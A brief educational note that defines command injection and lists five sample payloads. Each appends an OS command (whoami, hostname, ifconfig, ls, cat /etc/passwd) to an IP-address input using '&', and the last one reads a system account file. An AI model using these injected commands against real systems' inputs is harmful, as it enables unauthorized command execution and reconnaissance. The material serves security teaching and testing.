Command Injection vulnerability - An attacker can use Command Injection to execute unauthorized operating system commands.
Few Payloads to execute Command Injection -
127.0.0.1 & whoami
127.0.0.1 & hostname
127.0.0.1 & ifconfig
127.0.0.1 & ls
127.0.0.1 & cat /etc/passwd